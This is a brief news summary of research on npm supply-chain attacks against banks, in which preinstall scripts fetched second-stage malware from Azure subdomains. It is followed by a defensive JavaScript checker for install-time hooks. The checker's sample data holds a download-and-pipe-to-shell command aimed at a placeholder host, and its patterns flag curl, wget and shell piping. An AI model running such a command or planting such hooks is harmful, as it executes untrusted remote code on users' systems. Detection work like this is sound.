"Banking Sector Targeted in Open-Source Software Supply Chain Attacks"
Researchers have found what they say are the first open source software supply chain attacks that specifically target the banking sector. Checkmarx noted that these attacks exhibited sophisticated techniques, including attaching malicious functionality to specific components in the victim bank's web assets. To appear credible, the attackers created a fake LinkedIn profile and customized command-and-control (C2) centers for each target, exploiting legitimate services for malicious activities. The npm packages have been reported and taken down. In the first attack, the malware author posed as an employee of the target bank and uploaded packages to the npm registry in early April 2023. The modules included a preinstall script for activating the infection sequence. When launched, the script determined the host operating system and downloaded second-stage malware from a remote server by using a subdomain on Azure that contained the name of the bank. Checkmarx researchers say the perpetrator used Azure's CDN subdomains to effectively deliver the second-stage payload. Because Azure is a legitimate service, this tactic is clever in that it circumvents traditional deny list methods. This article continues to discuss the open source software supply chain attacks targeting the banking sector.
THN reports "Banking Sector Targeted in Open-Source Software Supply Chain Attacks"
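
A defender-side check for the install-time execution described above, added here as an example and not taken from Checkmarx or the original article: it lists every dependency manifest that declares a `preinstall`, `install` or `postinstall` script and attaches simple heuristic reasons for review. The package names, commands and URL are constructed sample data, and the signal patterns are assumptions.

```javascript
// Added example: flag dependencies that run code at install time.
// All package names, commands and URLs below are constructed sample data.

// Lifecycle hooks npm executes automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristics that make an install hook worth a closer look (not proof of malice).
const SIGNALS = [
  { reason: "fetches remote content", re: /\b(curl|wget|Invoke-WebRequest)\b|https?:\/\//i },
  { reason: "runs a bundled script", re: /\bnode\s+\S+\.js\b/i },
  { reason: "pipes output into a shell", re: /\|\s*(sh|bash|cmd|powershell)\b/i },
];

// Return one finding per install-time hook declared in a package.json object.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string" || command.trim() === "") continue;
    const reasons = SIGNALS.filter((s) => s.re.test(command)).map((s) => s.reason);
    findings.push({ name: manifest.name, version: manifest.version, hook, command, reasons });
  }
  return findings;
}

// Audit a whole dependency tree's worth of parsed manifests.
function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed manifests: a benign test script, a preinstall hook like the one
// the article describes, a native build step, and a download-and-run hook.
const sampleManifests = [
  { name: "left-utils-example", version: "1.2.0", scripts: { test: "node test.js" } },
  { name: "examplebank-ui-kit", version: "0.0.1", scripts: { preinstall: "node index.js" } },
  { name: "native-addon-example", version: "3.1.4", scripts: { install: "node-gyp rebuild" } },
  { name: "fetcher-example", version: "2.0.0",
    scripts: { postinstall: "curl -s https://cdn.example.invalid/setup.sh | sh" } },
];

for (const f of auditAll(sampleManifests)) {
  const why = f.reasons.length ? f.reasons.join(", ") : "no extra signal";
  console.log(`${f.name}@${f.version} ${f.hook}: ${f.command} [${why}]`);
}
```

Installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) keeps these hooks from running until the flagged packages have been reviewed.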